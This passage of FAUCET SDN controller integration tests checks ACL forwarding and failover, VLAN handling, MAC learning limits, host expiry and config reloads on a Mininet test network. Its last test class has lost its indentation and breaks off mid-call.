                    - port: %(port_1)d
        - rule:
            dl_type: 0x806
            dl_dst: "ff:ff:ff:ff:ff:ff"
            arp_tpa: "10.0.0.1"
            actions:
                output:
                    - port: %(port_1)d
        - rule:
            actions:
                allow: 0
    3:
        - rule:
            actions:
                allow: 0
    4:
        - rule:
            actions:
                allow: 0
"""
    CONFIG = """
        interfaces:
            %(port_1)d:
                native_vlan: 100
                acl_in: 1
            %(port_2)d:
                native_vlan: 100
                acl_in: 2
            %(port_3)d:
                native_vlan: 100
                acl_in: 3
            %(port_4)d:
                native_vlan: 100
                acl_in: 4
"""
    def test_untagged(self):
        """Bidirectional ping succeeds without requiring host learning."""
        host_a, host_b = self.hosts_name_ordered()[0:2]
        host_a.setMAC('0e:00:00:00:01:01')
        host_b.setMAC('0e:00:00:00:02:02')
        for src, dst in ((host_a, host_b), (host_b, host_a)):
            self.one_ipv4_ping(src, dst.IP(), require_host_learned=False)
class FaucetNailedFailoverForwardingTest(FaucetNailedForwardingTest):
    """Static forwarding with failover output groups to a backup port."""
    NUM_FAUCET_CONTROLLERS = 1
    CONFIG_GLOBAL = """
vlans:
    100:
        description: "untagged"
acls:
    1:
        - rule:
            dl_dst: "0e:00:00:00:02:02"
            actions:
                output:
                    failover:
                        group_id: 1001
                        ports: [%(port_2)d, %(port_3)d]
        - rule:
            dl_type: 0x806
            dl_dst: "ff:ff:ff:ff:ff:ff"
            arp_tpa: "10.0.0.2"
            actions:
                output:
                    failover:
                        group_id: 1002
                        ports: [%(port_2)d, %(port_3)d]
        - rule:
            actions:
                allow: 0
    2:
        - rule:
            dl_dst: "0e:00:00:00:01:01"
            actions:
                output:
                    port: %(port_1)d
        - rule:
            dl_type: 0x806
            dl_dst: "ff:ff:ff:ff:ff:ff"
            arp_tpa: "10.0.0.1"
            actions:
                output:
                    port: %(port_1)d
        - rule:
            actions:
                allow: 0
    3:
        - rule:
            dl_dst: "0e:00:00:00:01:01"
            actions:
                output:
                    port: %(port_1)d
        - rule:
            dl_type: 0x806
            dl_dst: "ff:ff:ff:ff:ff:ff"
            arp_tpa: "10.0.0.1"
            actions:
                output:
                    port: %(port_1)d
        - rule:
            actions:
                allow: 0
    4:
        - rule:
            actions:
                allow: 0
"""
    def test_untagged(self):
        """Traffic moves to the backup port when the primary port goes down."""
        host_a, host_b, host_c = self.hosts_name_ordered()[0:3]
        host_a.setMAC('0e:00:00:00:01:01')
        # host_c impersonates host_b (same MAC and IP) on the failover port.
        host_b.setMAC('0e:00:00:00:02:02')
        host_c.setMAC('0e:00:00:00:02:02')
        host_c.setIP(host_b.IP())
        for src, dst in ((host_a, host_b), (host_b, host_a)):
            self.one_ipv4_ping(src, dst.IP(), require_host_learned=False)
        self.set_port_down(self.port_map['port_2'])
        for src, dst in ((host_a, host_c), (host_c, host_a)):
            self.one_ipv4_ping(src, dst.IP(), require_host_learned=False)
class FaucetNailedFailoverForwardingOrderedTest(FaucetNailedForwardingTest):
    """Failover output groups declared with ordered (list-form) ACL actions."""
    NUM_FAUCET_CONTROLLERS = 1
    CONFIG_GLOBAL = """
vlans:
    100:
        description: "untagged"
acls:
    1:
        - rule:
            dl_dst: "0e:00:00:00:02:02"
            actions:
                output:
                    - failover:
                        group_id: 1001
                        ports: [%(port_2)d, %(port_3)d]
        - rule:
            dl_type: 0x806
            dl_dst: "ff:ff:ff:ff:ff:ff"
            arp_tpa: "10.0.0.2"
            actions:
                output:
                    - failover:
                        group_id: 1002
                        ports: [%(port_2)d, %(port_3)d]
        - rule:
            actions:
                allow: 0
    2:
        - rule:
            dl_dst: "0e:00:00:00:01:01"
            actions:
                output:
                    - port: %(port_1)d
        - rule:
            dl_type: 0x806
            dl_dst: "ff:ff:ff:ff:ff:ff"
            arp_tpa: "10.0.0.1"
            actions:
                output:
                    - port: %(port_1)d
        - rule:
            actions:
                allow: 0
    3:
        - rule:
            dl_dst: "0e:00:00:00:01:01"
            actions:
                output:
                    - port: %(port_1)d
        - rule:
            dl_type: 0x806
            dl_dst: "ff:ff:ff:ff:ff:ff"
            arp_tpa: "10.0.0.1"
            actions:
                output:
                    - port: %(port_1)d
        - rule:
            actions:
                allow: 0
    4:
        - rule:
            actions:
                allow: 0
"""
    def test_untagged(self):
        """Traffic moves to the backup port when the primary port goes down."""
        host_a, host_b, host_c = self.hosts_name_ordered()[0:3]
        host_a.setMAC('0e:00:00:00:01:01')
        # host_c impersonates host_b (same MAC and IP) on the failover port.
        host_b.setMAC('0e:00:00:00:02:02')
        host_c.setMAC('0e:00:00:00:02:02')
        host_c.setIP(host_b.IP())
        for src, dst in ((host_a, host_b), (host_b, host_a)):
            self.one_ipv4_ping(src, dst.IP(), require_host_learned=False)
        self.set_port_down(self.port_map['port_2'])
        for src, dst in ((host_a, host_c), (host_c, host_a)):
            self.one_ipv4_ping(src, dst.IP(), require_host_learned=False)
class FaucetUntaggedLLDPBlockedTest(FaucetUntaggedTest):
    """LLDP frames must not be forwarded between untagged hosts by default."""
    def test_untagged(self):
        """Hosts ping normally while LLDP/802.1x multicast is flood-blocked."""
        self.ping_all_when_learned()
        self.verify_lldp_blocked()
        # Verify 802.1x flood block triggered.
        bridge_mcast_match = {'dl_dst': '01:80:c2:00:00:00/ff:ff:ff:ff:ff:f0'}
        self.wait_nonzero_packet_count_flow(
            bridge_mcast_match, table_id=self._FLOOD_TABLE)
class FaucetUntaggedCDPTest(FaucetUntaggedTest):
    """CDP frames must not be forwarded between untagged hosts."""
    def test_untagged(self):
        """Hosts ping normally while CDP multicast is blocked."""
        self.ping_all_when_learned()
        self.verify_cdp_blocked()
class FaucetTaggedAndUntaggedSameVlanTest(FaucetTest):
    """Test mixture of tagged and untagged hosts on the same VLAN."""
    N_TAGGED = 1
    N_UNTAGGED = 3
    LINKS_PER_HOST = 1
    CONFIG_GLOBAL = """
vlans:
    100:
        description: "mixed"
"""
    CONFIG = """
        interfaces:
            %(port_1)d:
                tagged_vlans: [100]
            %(port_2)d:
                native_vlan: 100
            %(port_3)d:
                native_vlan: 100
            %(port_4)d:
                native_vlan: 100
"""
    def setUp(self):
        """Build a topology with N_TAGGED tagged and N_UNTAGGED untagged hosts.

        Fix: use the class attributes rather than the previously hard-coded
        1/3 literals, so subclasses overriding N_TAGGED/N_UNTAGGED get a
        matching topology (consistent with the other setUp methods here).
        """
        super().setUp()
        self.topo = self.topo_class(
            self.OVS_TYPE, self.ports_sock, self._test_name(), [self.dpid],
            n_tagged=self.N_TAGGED, n_untagged=self.N_UNTAGGED,
            links_per_host=self.LINKS_PER_HOST,
            hw_dpid=self.hw_dpid)
        self.start_net()
    def test_untagged(self):
        """Test connectivity including after port flapping."""
        self.ping_all_when_learned()
        self.flap_all_switch_ports()
        self.ping_all_when_learned()
        self.verify_broadcast()
        self.verify_no_bcast_to_self()
class FaucetTaggedAndUntaggedSameVlanEgressTest(FaucetTaggedAndUntaggedSameVlanTest):
    """Run the mixed tagged/untagged VLAN test with the egress pipeline enabled."""
    # Egress pipeline support requires datapath metadata support.
    REQUIRES_METADATA = True
    CONFIG = """
        egress_pipeline: True
        interfaces:
            %(port_1)d:
                tagged_vlans: [100]
            %(port_2)d:
                native_vlan: 100
            %(port_3)d:
                native_vlan: 100
            %(port_4)d:
                native_vlan: 100
"""
class FaucetTaggedAndUntaggedSameVlanGroupTest(FaucetTaggedAndUntaggedSameVlanTest):
    """Run the mixed tagged/untagged VLAN test with group_table enabled."""
    CONFIG = """
        group_table: True
        interfaces:
            %(port_1)d:
                tagged_vlans: [100]
            %(port_2)d:
                native_vlan: 100
            %(port_3)d:
                native_vlan: 100
            %(port_4)d:
                native_vlan: 100
"""
class FaucetUntaggedMaxHostsTest(FaucetUntaggedTest):
    """VLAN max_hosts caps learning and increments vlan_learn_bans."""
    CONFIG_GLOBAL = """
vlans:
    100:
        description: "untagged"
        max_hosts: 2
"""
    CONFIG = CONFIG_BOILER_UNTAGGED
    def test_untagged(self):
        """Exactly two hosts learn; further learn attempts are banned."""
        self.ping_all()
        learned = []
        for candidate in self.hosts_name_ordered():
            if self.host_learned(candidate):
                learned.append(candidate)
        self.assertEqual(2, len(learned))
        self.assertEqual(
            2, self.scrape_prometheus_var('vlan_hosts_learned', {'vlan': '100'}))
        self.assertGreater(
            self.scrape_prometheus_var('vlan_learn_bans', {'vlan': '100'}), 0)
class FaucetMaxHostsPortTest(FaucetUntaggedTest):
    """Per-port max_hosts caps learned MACs and increments port_learn_bans."""
    MAX_HOSTS = 3
    CONFIG_GLOBAL = """
vlans:
    100:
        description: "untagged"
"""
    CONFIG = """
        interfaces:
            %(port_1)d:
                native_vlan: 100
            %(port_2)d:
                native_vlan: 100
                max_hosts: 3
            %(port_3)d:
                native_vlan: 100
            %(port_4)d:
                native_vlan: 100
"""
    def test_untagged(self):
        """Offer 2x MAX_HOSTS MACs on port 2; only MAX_HOSTS may learn."""
        pinger, macvlan_host = self.hosts_name_ordered()[:2]
        self.ping_all_when_learned()
        for host_n in range(10, 10 + (self.MAX_HOSTS * 2)):
            mac_intf = 'mac%u' % host_n
            mac_ipv4 = '10.0.0.%u' % host_n
            self.add_macvlan(macvlan_host, mac_intf, ipa=mac_ipv4)
            ping_cmd = mininet_test_util.timeout_cmd(
                'fping %s -c1 -t1 -I%s %s > /dev/null 2> /dev/null' % (
                    self.FPING_ARGS_SHORT, mac_intf, pinger.IP()),
                2)
            macvlan_host.cmd(ping_cmd)
        src_flows = self.get_matching_flows_on_dpid(
            self.dpid,
            {'dl_vlan': '100', 'in_port': int(self.port_map['port_2'])},
            table_id=self._ETH_SRC_TABLE)
        self.assertEqual(self.MAX_HOSTS, len(src_flows))
        port_labels = self.port_labels(self.port_map['port_2'])
        self.assertGreater(
            self.scrape_prometheus_var('port_learn_bans', port_labels), 0)
        learned_macs = []
        for _, mac in self.scrape_prometheus_var(
                'learned_macs', dict(port_labels, vlan=100), multiple=True):
            if mac:
                learned_macs.append(mac)
        self.assertEqual(self.MAX_HOSTS, len(learned_macs))
class FaucetSingleHostsTimeoutPrometheusTest(FaucetUntaggedTest):
    """Test that hosts learned and reported in Prometheus, time out."""
    TIMEOUT = 15
    CONFIG_GLOBAL = """
vlans:
    100:
        description: "untagged"
"""
    # Short timeouts and no learn jitter so host expiry is observable quickly.
    CONFIG = """
        timeout: 25
        arp_neighbor_timeout: 12
        nd_neighbor_timeout: 12
        ignore_learn_ins: 0
        learn_jitter: 0
        cache_update_guard_time: 1
""" + CONFIG_BOILER_UNTAGGED
    def hosts_learned(self, hosts):
        """Check that hosts are learned by FAUCET on the expected ports."""
        macs_learned = []
        for mac, port in hosts.items():
            if self.prom_mac_learned(mac, port=port):
                self.mac_learned(mac, in_port=port)
                macs_learned.append(mac)
        return macs_learned
    def verify_hosts_learned(self, first_host, second_host, mac_ips, hosts):
        """fping the macvlan IPs from first_host until all MACs learn, else fail."""
        mac_ipv4s = [mac_ipv4 for mac_ipv4, _ in mac_ips]
        fping_cmd = mininet_test_util.timeout_cmd(
            'fping %s -c%u %s' % (
                self.FPING_ARGS_SHORT, int(self.TIMEOUT / 3), ' '.join(mac_ipv4s)),
            self.TIMEOUT / 2)
        for _ in range(3):
            fping_out = first_host.cmd(fping_cmd)
            self.assertTrue(fping_out, msg='fping did not complete: %s' % fping_cmd)
            macs_learned = self.hosts_learned(hosts)
            if len(macs_learned) == len(hosts):
                return
            time.sleep(1)
        # Collect interface/ARP diagnostics from both hosts for the failure message.
        first_host_diag = first_host.cmd('ifconfig -a ; arp -an')
        second_host_diag = second_host.cmd('ifconfig -a ; arp -an')
        self.fail('%s cannot be learned (%s != %s)\nfirst host %s\nsecond host %s\n' % (
            mac_ips, macs_learned, fping_out, first_host_diag, second_host_diag))
    def test_untagged(self):
        """Learn batches of macvlan hosts, down them, then verify all expire."""
        first_host, second_host = self.hosts_name_ordered()[:2]
        all_learned_mac_ports = {}
        # learn batches of hosts, then down them
        for base in (10, 20, 30):
            def add_macvlans(base, count):
                # Create count macvlan interfaces on second_host; return their
                # interface names, (IP, MAC) pairs and MAC->port mapping.
                mac_intfs = []
                mac_ips = []
                learned_mac_ports = {}
                for i in range(base, base + count):
                    mac_intf = 'mac%u' % i
                    mac_intfs.append(mac_intf)
                    mac_ipv4 = '10.0.0.%u' % i
                    self.add_macvlan(second_host, mac_intf, ipa=mac_ipv4)
                    macvlan_mac = self.get_mac_of_intf(mac_intf, second_host)
                    learned_mac_ports[macvlan_mac] = self.port_map['port_2']
                    mac_ips.append((mac_ipv4, macvlan_mac))
                return (mac_intfs, mac_ips, learned_mac_ports)
            def down_macvlans(macvlans):
                # Administratively down the macvlans so they fall silent.
                for macvlan in macvlans:
                    second_host.cmd('ip link set dev %s down' % macvlan)
            def learn_then_down_hosts(base, count):
                mac_intfs, mac_ips, learned_mac_ports = add_macvlans(base, count)
                self.verify_hosts_learned(first_host, second_host, mac_ips, learned_mac_ports)
                down_macvlans(mac_intfs)
                return learned_mac_ports
            learned_mac_ports = learn_then_down_hosts(base, 5)
            all_learned_mac_ports.update(learned_mac_ports)
        # make sure at least one host still learned
        learned_macs = self.hosts_learned(all_learned_mac_ports)
        self.assertTrue(learned_macs)
        before_expiry_learned_macs = learned_macs
        # make sure they all eventually expire
        for _ in range(self.TIMEOUT * 3):
            learned_macs = self.hosts_learned(all_learned_mac_ports)
            self.verify_learn_counters(
                100, list(range(1, len(self.hosts_name_ordered()) + 1)))
            if not learned_macs:
                break
            time.sleep(1)
        self.assertFalse(learned_macs, msg='MACs did not expire: %s' % learned_macs)
        self.assertTrue(before_expiry_learned_macs)
        # Expired MACs must also have their eth_dst flows removed.
        for mac in before_expiry_learned_macs:
            self.wait_until_no_matching_flow({'eth_dst': mac}, table_id=self._ETH_DST_TABLE)
class FaucetSingleHostsNoIdleTimeoutPrometheusTest(FaucetSingleHostsTimeoutPrometheusTest):
    """Test broken reset idle timer on flow refresh workaround."""
    # Same expiry test as the parent, but with idle_dst disabled and shorter
    # timeouts.
    CONFIG = """
        timeout: 15
        arp_neighbor_timeout: 4
        nd_neighbor_timeout: 4
        ignore_learn_ins: 0
        learn_jitter: 0
        cache_update_guard_time: 1
        idle_dst: False
""" + CONFIG_BOILER_UNTAGGED
class FaucetSingleL3LearnMACsOnPortTest(FaucetUntaggedTest):
    """Scale test: learn many L3 hosts against a FAUCET VIP."""
    # TODO: currently set to accommodate least hardware
    # Plain function (not a method): evaluated at class-body time so the
    # value can be interpolated into the config strings below.
    def _max_hosts(): # pylint: disable=no-method-argument,no-self-use
        return 512
    MAX_HOSTS = _max_hosts()
    TEST_IPV4_NET = '10.0.0.0'
    TEST_IPV4_PREFIX = 16 # must hold more than MAX_HOSTS + 4
    LEARN_IPV4 = '10.0.254.254'
    CONFIG_GLOBAL = """
vlans:
    100:
        description: "untagged"
        max_hosts: %u
        faucet_vips: ["10.0.254.254/16"]
""" % (_max_hosts() + 4)
    # Table sizes padded above MAX_HOSTS so learning is not table-limited.
    CONFIG = ("""
        ignore_learn_ins: 0
        metrics_rate_limit_sec: 3
        table_sizes:
            eth_src: %u
            eth_dst: %u
            ipv4_fib: %u
""" % (_max_hosts() + 64, _max_hosts() + 64, _max_hosts() + 64) + """
        interfaces:
            %(port_1)d:
                native_vlan: 100
                max_hosts: 4096
            %(port_2)d:
                native_vlan: 100
                max_hosts: 4096
            %(port_3)d:
                native_vlan: 100
                max_hosts: 4096
            %(port_4)d:
                native_vlan: 100
                max_hosts: 4096
""")
    def test_untagged(self):
        """Learn up to MAX_HOSTS L3 hosts in batches of 64."""
        test_net = ipaddress.IPv4Network(
            '%s/%s' % (self.TEST_IPV4_NET, self.TEST_IPV4_PREFIX))
        learn_ip = ipaddress.IPv4Address(self.LEARN_IPV4)
        self.verify_learning(test_net, learn_ip, 64, self.MAX_HOSTS)
class FaucetSingleL2LearnMACsOnPortTest(FaucetUntaggedTest):
    """Scale test: learn many L2 hosts (no FAUCET VIP/routing involved)."""
    # TODO: currently set to accommodate least hardware
    # Plain function (not a method): evaluated at class-body time so the
    # value can be interpolated into the config strings below.
    def _max_hosts(): # pylint: disable=no-method-argument,no-self-use
        return 1024
    MAX_HOSTS = _max_hosts()
    TEST_IPV4_NET = '10.0.0.0'
    TEST_IPV4_PREFIX = 16 # must hold more than MAX_HOSTS + 4
    LEARN_IPV4 = '10.0.0.1'
    CONFIG_GLOBAL = """
vlans:
    100:
        description: "untagged"
        max_hosts: %u
""" % (_max_hosts() + 4)
    # Table sizes padded above MAX_HOSTS so learning is not table-limited.
    CONFIG = ("""
        ignore_learn_ins: 0
        metrics_rate_limit_sec: 3
        table_sizes:
            eth_src: %u
            eth_dst: %u
""" % (_max_hosts() + 64, _max_hosts() + 64) + """
        interfaces:
            %(port_1)d:
                native_vlan: 100
                max_hosts: 4096
            %(port_2)d:
                native_vlan: 100
                max_hosts: 4096
            %(port_3)d:
                native_vlan: 100
                max_hosts: 4096
            %(port_4)d:
                native_vlan: 100
                max_hosts: 4096
""")
    def test_untagged(self):
        """Learn up to MAX_HOSTS L2 hosts in batches of 64."""
        test_net = ipaddress.IPv4Network(
            '%s/%s' % (self.TEST_IPV4_NET, self.TEST_IPV4_PREFIX))
        learn_ip = ipaddress.IPv4Address(self.LEARN_IPV4)
        self.verify_learning(test_net, learn_ip, 64, self.MAX_HOSTS)
class FaucetUntaggedHUPTest(FaucetUntaggedTest):
    """Test handling HUP signal without config change."""
    def _configure_count_with_retry(self, expected_count):
        """Poll (up to 3 times, 1s apart) until every FAUCET controller
        reports expected_count configure calls, then assert equality.

        Fix: removed the dead ``counts = []`` initialization before the loop
        (the loop body always reassigns it) and build the per-retry list with
        a comprehension.
        """
        expected = [expected_count for _ in range(self.NUM_FAUCET_CONTROLLERS)]
        for _ in range(3):
            counts = [
                self.get_configure_count(controller=controller.name)
                for controller in self.faucet_controllers]
            if counts == expected:
                break
            time.sleep(1)
        self.assertEqual(
            counts, expected,
            'Controller configure counts %s != expected counts %s' % (counts, expected))
    def test_untagged(self):
        """Test that FAUCET receives HUP signal and keeps switching."""
        init_config_count = self.get_configure_count()
        reload_type_vars = (
            'faucet_config_reload_cold',
            'faucet_config_reload_warm')
        # Snapshot reload counters; they must be unchanged at the end.
        reload_vals = {}
        for var in reload_type_vars:
            reload_vals[var] = self.scrape_prometheus_var(
                var, dpid=True, default=None)
        for i in range(init_config_count, init_config_count + 3):
            self._configure_count_with_retry(i)
            # Append a no-op change (blank line) and HUP; no reconf expected.
            with open(self.faucet_config_path, 'a', encoding='utf-8') as config_file:
                config_file.write('\n')
            self.verify_faucet_reconf(change_expected=False)
            self._configure_count_with_retry(i + 1)
        # The datapath must have stayed connected throughout.
        self.assertEqual(
            self.scrape_prometheus_var(
                'of_dp_disconnections_total', dpid=True, default=None),
            0)
        self.assertEqual(
            self.scrape_prometheus_var(
                'of_dp_connections_total', dpid=True, default=None),
            1)
        self.wait_until_controller_flow()
        self.ping_all_when_learned()
        # No warm or cold reloads may have been triggered by the HUPs.
        for var in reload_type_vars:
            self.assertEqual(
                reload_vals[var],
                self.scrape_prometheus_var(var, dpid=True, default=None))
class FaucetChangeVlanACLTest(FaucetTest):
    """Test reloading a changed VLAN ACL from an included config file."""
    N_UNTAGGED = 4
    N_TAGGED = 0
    LINKS_PER_HOST = 1
    CONFIG_GLOBAL = """
vlans:
    100:
        description: "untagged"
        acls_in: [1]
"""
    # Initial ACL: allow IPv4 plus a catch-all allow.
    START_ACL_CONFIG = """
acls:
    1:
        rules:
        - rule:
            eth_type: 0x800
            actions: {allow: 1}
        - rule:
            actions: {allow: 1}
"""
    # Updated ACL: adds an ARP (0x806) rule ahead of the IPv4 rule.
    UPDATE_ACL_CONFIG = """
acls:
    1:
        rules:
        - rule:
            eth_type: 0x806
            actions: {allow: 1}
        - rule:
            eth_type: 0x800
            actions: {allow: 1}
        - rule:
            actions: {allow: 1}
"""
    # pylint: disable=invalid-name
    CONFIG = CONFIG_BOILER_UNTAGGED
    def setUp(self):
        """Write the starting ACL include file and start the network."""
        super().setUp()
        self.acl_config_file = os.path.join(self.tmpdir, 'acl.txt')
        self.CONFIG = '\n'.join(
            (self.CONFIG, 'include:\n - %s' % self.acl_config_file))
        with open(self.acl_config_file, 'w', encoding='utf-8') as acf:
            acf.write(self.START_ACL_CONFIG)
        self.topo = self.topo_class(
            self.OVS_TYPE, self.ports_sock, self._test_name(), [self.dpid],
            n_tagged=self.N_TAGGED, n_untagged=self.N_UNTAGGED,
            links_per_host=self.LINKS_PER_HOST, hw_dpid=self.hw_dpid)
        self.start_net()
    def test_vlan_acl_update(self):
        """Apply the updated ACL, verify flows, then revert and verify again."""
        self.ping_all_when_learned()
        new_yaml_acl_conf = yaml_load(self.UPDATE_ACL_CONFIG)
        self.reload_conf(
            new_yaml_acl_conf, self.acl_config_file, # pytype: disable=attribute-error
            restart=True, cold_start=True)
        self.wait_until_matching_flow(
            {'dl_type': 0x800}, table_id=self._VLAN_ACL_TABLE)
        self.wait_until_matching_flow(
            {'dl_type': 0x806}, table_id=self._VLAN_ACL_TABLE)
        self.ping_all_when_learned()
        orig_yaml_acl_conf = yaml_load(self.START_ACL_CONFIG)
        self.reload_conf(
            orig_yaml_acl_conf, self.acl_config_file, # pytype: disable=attribute-error
            restart=True, cold_start=True)
        self.wait_until_matching_flow(
            {'dl_type': 0x800}, table_id=self._VLAN_ACL_TABLE)
        # The ARP rule must be gone after reverting to the original ACL.
        self.wait_until_no_matching_flow(
            {'dl_type': 0x806}, table_id=self._VLAN_ACL_TABLE)
        self.ping_all_when_learned()
class FaucetIPv4TupleTest(FaucetTest):
    """Scale test: push growing sets of IPv4 5-tuple exact-match ACL rules."""
    MAX_RULES = 1024
    ETH_TYPE = IPV4_ETH
    NET_BASE = ipaddress.IPv4Network('10.0.0.0/16')
    N_UNTAGGED = 4
    N_TAGGED = 0
    LINKS_PER_HOST = 1
    CONFIG_GLOBAL = """
vlans:
    100:
        description: "untagged"
"""
    # port_acl sized above MAX_RULES so rule pushes are not table-limited.
    CONFIG = """
        table_sizes:
            port_acl: 1100
        interfaces:
            %(port_1)d:
                native_vlan: 100
                acl_in: 1
"""
    START_ACL_CONFIG = """
acls:
  1:
    exact_match: True
    rules:
    - rule:
        actions: {allow: 1}
        eth_type: 2048
        ip_proto: 6
        ipv4_dst: 127.0.0.1
        ipv4_src: 127.0.0.1
        tcp_dst: 65535
        tcp_src: 65535
"""
    def setUp(self):
        """Write the starting ACL include file and start the network."""
        super().setUp()
        self.acl_config_file = os.path.join(self.tmpdir, 'acl.txt')
        self.CONFIG = '\n'.join(
            (self.CONFIG, 'include:\n - %s' % self.acl_config_file))
        with open(self.acl_config_file, 'w', encoding='utf-8') as acf:
            acf.write(self.START_ACL_CONFIG)
        self.topo = self.topo_class(
            self.OVS_TYPE, self.ports_sock, self._test_name(), [self.dpid],
            n_tagged=self.N_TAGGED, n_untagged=self.N_UNTAGGED,
            links_per_host=self.LINKS_PER_HOST, hw_dpid=self.hw_dpid)
        self.start_net()
    def _push_tuples(self, eth_type, host_ips):
        """Reload ACLs with 1, 2, 4, ... up to len(host_ips) unique rules."""
        max_rules = len(host_ips)
        rules = 1
        while rules <= max_rules:
            rules_yaml = []
            for rule in range(rules):
                host_ip = host_ips[rule]
                # Each rule gets a distinct TCP port (wraps at 2**16).
                port = (rule + 1) % 2**16
                ip_match = str(host_ip)
                rule_yaml = {
                    'eth_type': eth_type,
                    'ip_proto': 6,
                    'tcp_src': port,
                    'tcp_dst': port,
                    'ipv%u_src' % host_ip.version: ip_match,
                    'ipv%u_dst' % host_ip.version: ip_match,
                    'actions': {'allow': 1},
                }
                rules_yaml.append({'rule': rule_yaml})
            yaml_acl_conf = {'acls': {1: {'exact_match': True, 'rules': rules_yaml}}}
            tuple_txt = '%u IPv%u tuples\n' % (len(rules_yaml), host_ip.version)
            error('pushing %s' % tuple_txt)
            self.reload_conf(
                yaml_acl_conf, self.acl_config_file, # pytype: disable=attribute-error
                restart=True, cold_start=False)
            error('pushed %s' % tuple_txt)
            # port/host_ip still hold the last rule's values from the for loop.
            self.wait_until_matching_flow(
                {'tp_src': port, 'ip_proto': 6, 'dl_type': eth_type}, table_id=0)
            rules *= 2
    def test_tuples(self):
        """Push rule sets doubling in size up to MAX_RULES."""
        host_ips = list(itertools.islice(self.NET_BASE.hosts(), self.MAX_RULES))
        self._push_tuples(self.ETH_TYPE, host_ips)
class FaucetIPv6TupleTest(FaucetIPv4TupleTest):
    """Scale test: push growing sets of IPv6 5-tuple exact-match ACL rules."""
    MAX_RULES = 1024
    ETH_TYPE = IPV6_ETH
    NET_BASE = ipaddress.IPv6Network('fc00::00/64')
    # eth_type 34525 == 0x86dd (IPv6).
    START_ACL_CONFIG = """
acls:
  1:
    exact_match: True
    rules:
    - rule:
        actions: {allow: 1}
        eth_type: 34525
        ip_proto: 6
        ipv6_dst: ::1
        ipv6_src: ::1
        tcp_dst: 65535
        tcp_src: 65535
"""
class FaucetConfigReloadTestBase(FaucetTest):
    """Test handling HUP signal with config change."""
    N_UNTAGGED = 4
    N_TAGGED = 0
    LINKS_PER_HOST = 1
    CONFIG_GLOBAL = """
vlans:
    100:
        description: "untagged"
    200:
        description: "untagged"
"""
    CONFIG = """
        interfaces:
            %(port_1)d:
                native_vlan: 100
                acl_in: allow
            %(port_2)d:
                native_vlan: 100
            %(port_3)d:
                native_vlan: 100
            %(port_4)d:
                native_vlan: 100
                tagged_vlans: [200]
"""
    # ACL template; the COOKIE placeholder is replaced with a random value in
    # setUp() so tests can assert ACL flows carry the expected cookie.
    ACL = """
acls:
    1:
        - rule:
            description: "rule 1"
            cookie: COOKIE
            dl_type: 0x800
            ip_proto: 6
            tcp_dst: 5001
            actions:
                allow: 0
        - rule:
            cookie: COOKIE
            dl_type: 0x800
            ip_proto: 6
            tcp_dst: 5002
            actions:
                allow: 1
        - rule:
            cookie: COOKIE
            actions:
                allow: 1
    2:
        - rule:
            cookie: COOKIE
            dl_type: 0x800
            ip_proto: 6
            tcp_dst: 5001
            actions:
                allow: 1
        - rule:
            cookie: COOKIE
            dl_type: 0x800
            ip_proto: 6
            tcp_dst: 5002
            actions:
                allow: 0
        - rule:
            cookie: COOKIE
            actions:
                allow: 1
    3:
        - rule:
            cookie: COOKIE
            dl_type: 0x800
            ip_proto: 6
            tcp_dst: 5003
            actions:
                allow: 0
    4:
        - rule:
            cookie: COOKIE
            dl_type: 0x800
            ip_proto: 6
            tcp_dst: 5002
            actions:
                allow: 1
        - rule:
            cookie: COOKIE
            dl_type: 0x800
            ip_proto: 6
            tcp_dst: 5001
            actions:
                allow: 0
    deny:
        - rule:
            cookie: COOKIE
            dl_type: 0x800
            ip_proto: 6
            tcp_dst: 65535
            actions:
                allow: 0
        - rule:
            cookie: COOKIE
            actions:
                allow: 0
    allow:
        - rule:
            cookie: COOKIE
            dl_type: 0x800
            ip_proto: 6
            tcp_dst: 65535
            actions:
                allow: 1
        - rule:
            cookie: COOKIE
            actions:
                allow: 1
"""
    # Set per-instance in setUp() to the random cookie used in the ACL.
    ACL_COOKIE = None
    def setUp(self):
        """Install the cookie-substituted ACL include file and start the net."""
        super().setUp()
        self.ACL_COOKIE = random.randint(1, 2**16 - 1)
        self.ACL = self.ACL.replace('COOKIE', str(self.ACL_COOKIE))
        self.acl_config_file = '%s/acl.yaml' % self.tmpdir
        with open(self.acl_config_file, 'w', encoding='utf-8') as config_file:
            config_file.write(self.ACL)
        self.CONFIG = '\n'.join(
            (self.CONFIG, 'include:\n - %s' % self.acl_config_file))
        self.topo = self.topo_class(
            self.OVS_TYPE, self.ports_sock, self._test_name(), [self.dpid],
            n_tagged=self.N_TAGGED, n_untagged=self.N_UNTAGGED,
            links_per_host=self.LINKS_PER_HOST, hw_dpid=self.hw_dpid)
        self.start_net()
class FaucetDelPortTest(FaucetConfigReloadTestBase):
    """Removing a port from config must remove its learned flows."""
    CONFIG_GLOBAL = """
vlans:
    100:
        description: "untagged"
    200:
        description: "untagged"
"""
    CONFIG = """
        interfaces:
            %(port_1)d:
                native_vlan: 100
                acl_in: allow
            %(port_2)d:
                native_vlan: 100
            %(port_3)d:
                native_vlan: 100
            %(port_4)d:
                native_vlan: 200
"""
    def test_port_down_flow_gone(self):
        """Deleting port_4 removes the eth_dst flow for its learned host."""
        victim_host = self.hosts_name_ordered()[-1]
        self.require_host_learned(victim_host)
        dst_match = {'eth_dst': victim_host.MAC()}
        self.wait_until_matching_flow(
            dst_match, table_id=self._ETH_DST_TABLE)
        # Remove port_4 (the victim's port) from the configuration entirely.
        self.change_port_config(
            self.port_map['port_4'], None, None,
            restart=True, cold_start=None)
        self.wait_until_no_matching_flow(
            dst_match, table_id=self._ETH_DST_TABLE)
class FaucetConfigReloadTest(FaucetConfigReloadTestBase):
def test_add_unknown_dp(self):
conf = self._get_faucet_conf()
conf['dps']['unknown'] = {
'dp_id': int(self.rand_dpid()),
'hardware': 'Open vSwitch',
}
self.reload_conf(
conf, self.faucet_config_path,
restart=True, cold_start=False, change_expected=False)
def test_tabs_are_bad(self):
self._enable_event_log()
self.ping_all_when_learned()
self.assertEqual(0, self.scrape_prometheus_var('faucet_config_load_error', dpid=False))
event = self._wait_until_matching_event(lambda event: event['CONFIG_CHANGE']['success'])
good_config_hash_info = event['CONFIG_CHANGE']['config_hash_info']
self.assertNotEqual('', good_config_hash_info['hashes'])
orig_conf = self._get_faucet_conf()
self.force_faucet_reload(
'\t'.join(('tabs', 'are', 'bad')))
self.assertEqual(1, self.scrape_prometheus_var('faucet_config_load_error', dpid=False))
event = self._wait_until_matching_event(lambda event: not event['CONFIG_CHANGE']['success'])
self.assertEqual('', event['CONFIG_CHANGE']['config_hash_info']['hashes'])
self.ping_all_when_learned()
self.reload_conf(
orig_conf, self.faucet_config_path,
